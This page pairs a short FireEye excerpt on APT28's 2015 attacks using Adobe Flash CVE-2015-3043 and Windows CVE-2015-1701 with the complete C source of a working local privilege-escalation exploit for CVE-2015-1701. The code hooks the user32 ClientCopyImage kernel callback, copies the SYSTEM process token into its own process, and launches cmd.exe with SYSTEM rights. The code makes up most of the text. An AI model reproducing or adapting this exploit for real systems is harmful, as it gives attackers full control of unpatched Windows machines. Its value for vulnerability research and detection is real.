FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows. Using the Dynamic Threat Intelligence Cloud (DTI), FireEye researchers detected a pattern of attacks beginning on April 13th, 2015. Adobe independently patched the vulnerability (CVE-2015-3043) in APSB15-06. Through correlation of technical indicators and command and control infrastructure, FireEye assess that APT28 is probably responsible for this activity.
Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows (CVE-2015-1701). While there is not yet a patch available for the Windows vulnerability, updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous. We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043. The Microsoft Security Team is working on a fix for CVE-2015-1701.
/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2015 * * TITLE: MAIN.C * * VERSION: 1.00 * * DATE: 10 May 2015 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ //Disable nonmeaningful warnings. #pragma warning(disable: 4005) // macro redefinition #pragma warning(disable: 4054) // ‘type cast‘ : from function pointer %s to data pointer %s #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #define OEMRESOURCE #include <Windows.h> #include <ntstatus.h> #include "ntos.h" #include "minirtl\minirtl.h" #define TYPE_WINDOW 1 #define HMUNIQSHIFT 16 typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p); typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process); typedef PVOID PHEAD; typedef struct _HANDLEENTRY { PHEAD phead; // Pointer to the Object. PVOID pOwner; // PTI or PPI BYTE bType; // Object handle type BYTE bFlags; // Flags WORD wUniq; // Access count. } HANDLEENTRY, *PHANDLEENTRY; typedef struct _SERVERINFO { WORD wRIPFlags; WORD wSRVIFlags; WORD wRIPPID; WORD wRIPError; ULONG cHandleEntries; // incomplete } SERVERINFO, *PSERVERINFO; typedef struct _SHAREDINFO { PSERVERINFO psi; PHANDLEENTRY aheList; ULONG HeEntrySize; // incomplete } SHAREDINFO, *PSHAREDINFO; static const TCHAR MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow"); pPLPBPI g_PsLookupProcessByProcessIdPtr = NULL; pUser32_ClientCopyImage g_originalCCI = NULL; PVOID g_ppCCI = NULL, g_w32theadinfo = NULL; int g_shellCalled = 0; DWORD g_OurPID; DWORD g_EPROCESS_TokenOffset = 0; /* * supGetSystemInfo * * Purpose: * * Returns buffer with system information by given InfoClass. * * Returned buffer must be freed with HeapFree after usage. * Function will return error after 100 attempts. * */ PVOID supGetSystemInfo( _In_ SYSTEM_INFORMATION_CLASS InfoClass ) { INT c = 0; PVOID Buffer = NULL; ULONG Size = 0x1000; NTSTATUS status; ULONG memIO; do { Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size); if (Buffer != NULL) { status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); } else { return NULL; } if (status == STATUS_INFO_LENGTH_MISMATCH) { HeapFree(GetProcessHeap(), 0, Buffer); Size *= 2; } c++; if (c > 100) { status = STATUS_SECRET_TOO_LONG; break; } } while (status == STATUS_INFO_LENGTH_MISMATCH); if (NT_SUCCESS(status)) { return Buffer; } if (Buffer) { HeapFree(GetProcessHeap(), 0, Buffer); } return NULL; } /* * supIsProcess32bit * * Purpose: * * Return TRUE if given process is under WOW64, FALSE otherwise. * */ BOOLEAN supIsProcess32bit( _In_ HANDLE hProcess ) { NTSTATUS status; PROCESS_EXTENDED_BASIC_INFORMATION pebi; if (hProcess == NULL) { return FALSE; } //query if this is wow64 process RtlSecureZeroMemory(&pebi, sizeof(pebi)); pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION); status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL); if (NT_SUCCESS(status)) { return (pebi.IsWow64Process == 1); } return FALSE; } /* * GetPsLookupProcessByProcessId * * Purpose: * * Return address of PsLookupProcessByProcessId routine to be used next by shellcode. * */ ULONG_PTR GetPsLookupProcessByProcessId( VOID ) { BOOL cond = FALSE; ULONG rl = 0; PVOID MappedKernel = NULL; ULONG_PTR KernelBase = 0L, FuncAddress = 0L; PRTL_PROCESS_MODULES miSpace = NULL; CHAR KernelFullPathName[MAX_PATH * 2]; do { miSpace = supGetSystemInfo(SystemModuleInformation); if (miSpace == NULL) { break; } if (miSpace->NumberOfModules == 0) { break; } rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH); if (rl == 0) { break; } KernelFullPathName[rl] = (CHAR)‘\\‘; _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]); KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; HeapFree(GetProcessHeap(), 0, miSpace); miSpace = NULL; MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedKernel == NULL) { break; } FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId"); FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel; } while (cond); if (MappedKernel != NULL) { FreeLibrary(MappedKernel); } if (miSpace != NULL) { HeapFree(GetProcessHeap(), 0, miSpace); } return FuncAddress; } /* * GetFirstThreadHWND * * Purpose: * * Locate, convert and return hwnd for current thread from SHAREDINFO->aheList. * */ HWND GetFirstThreadHWND( VOID ) { PSHAREDINFO pse; HMODULE huser32; PHANDLEENTRY List; ULONG_PTR c, k; huser32 = GetModuleHandle(TEXT("user32.dll")); if (huser32 == NULL) return 0; pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo"); if (pse == NULL) return 0; List = pse->aheList; k = pse->psi->cHandleEntries; if (pse->HeEntrySize != sizeof(HANDLEENTRY)) return 0; // // Locate, convert and return hwnd for current thread. // for (c = 0; c < k; c++) if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) { return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT)); } return 0; } /* * StealProcessToken * * Purpose: * * Copy system token to current process object. * */ NTSTATUS NTAPI StealProcessToken( VOID ) { NTSTATUS Status; PVOID CurrentProcess = NULL; PVOID SystemProcess = NULL; Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess); if (NT_SUCCESS(Status)) { Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess); if (NT_SUCCESS(Status)) { if (g_EPROCESS_TokenOffset) { *(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset); } } } return Status; } /* * MainWindowProc * * Purpose: * * To be called in ring0. * */ LRESULT CALLBACK MainWindowProc( _In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam ) { UNREFERENCED_PARAMETER(hwnd); UNREFERENCED_PARAMETER(uMsg); UNREFERENCED_PARAMETER(wParam); UNREFERENCED_PARAMETER(lParam); if (g_shellCalled == 0) { StealProcessToken(); g_shellCalled = 1; } return 0; } /* * hookCCI * * Purpose: * * _ClientCopyImage hook handler. * */ NTSTATUS NTAPI hookCCI( PVOID p ) { InterlockedExchangePointer(g_ppCCI, g_originalCCI); //restore original callback SetWindowLongPtr(GetFirstThreadHWND(), GWLP_WNDPROC, (LONG_PTR)&DefWindowProc); return g_originalCCI(p); } /* * main * * Purpose: * * Program entry point. * */ void main() { PTEB teb = NtCurrentTeb(); PPEB peb = teb->ProcessEnvironmentBlock; WNDCLASSEX wincls; HINSTANCE hinst = GetModuleHandle(NULL); BOOL rv = TRUE; MSG msg1; ATOM class_atom; HWND MainWindow; DWORD prot; OSVERSIONINFOW osver; DWORD cch; TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1]; STARTUPINFO startupInfo; PROCESS_INFORMATION processInfo; RtlSecureZeroMemory(&osver, sizeof(osver)); osver.dwOSVersionInfoSize = sizeof(osver); RtlGetVersion(&osver); if (osver.dwBuildNumber > 7601) { ExitProcess((UINT)-1); return; } if (supIsProcess32bit(GetCurrentProcess())) { ExitProcess((UINT)-2); return; } g_OurPID = GetCurrentProcessId(); g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId(); #ifdef _WIN64 g_EPROCESS_TokenOffset = 0x208; #else g_EPROCESS_TokenOffset = 0xF8; #endif if (g_PsLookupProcessByProcessIdPtr == NULL) { ExitProcess((UINT)-3); return; } RtlSecureZeroMemory(&wincls, sizeof(wincls)); wincls.cbSize = sizeof(WNDCLASSEX); wincls.lpfnWndProc = &MainWindowProc; wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION); wincls.lpszClassName = MAINWINDOWCLASSNAME; class_atom = RegisterClassEx(&wincls); while (class_atom) { g_w32theadinfo = teb->Win32ThreadInfo; g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36]; // <--- User32_ClientCopyImage INDEX if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot)) { break; } g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI); MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom), NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL); if (g_shellCalled == 1) { RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo)); RtlSecureZeroMemory(&processInfo, sizeof(processInfo)); startupInfo.cb = sizeof(startupInfo); GetStartupInfo(&startupInfo); RtlSecureZeroMemory(sysdir, sizeof(sysdir)); cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH); if ((cch != 0) && (cch < MAX_PATH)) { RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); _strcpy(cmdbuf, sysdir); _strcat(cmdbuf, TEXT("cmd.exe")); if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL, sysdir, &startupInfo, &processInfo)) { CloseHandle(processInfo.hProcess); CloseHandle(processInfo.hThread); } } } else { OutputDebugString(TEXT(" Failed \r\n")); } if (!MainWindow) break; do { rv = GetMessage(&msg1, NULL, 0, 0); if (rv == -1) break; TranslateMessage(&msg1); DispatchMessage(&msg1); } while (rv != 0); break; } if (class_atom) UnregisterClass(MAKEINTATOM(class_atom), hinst); ExitProcess(0); }
Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack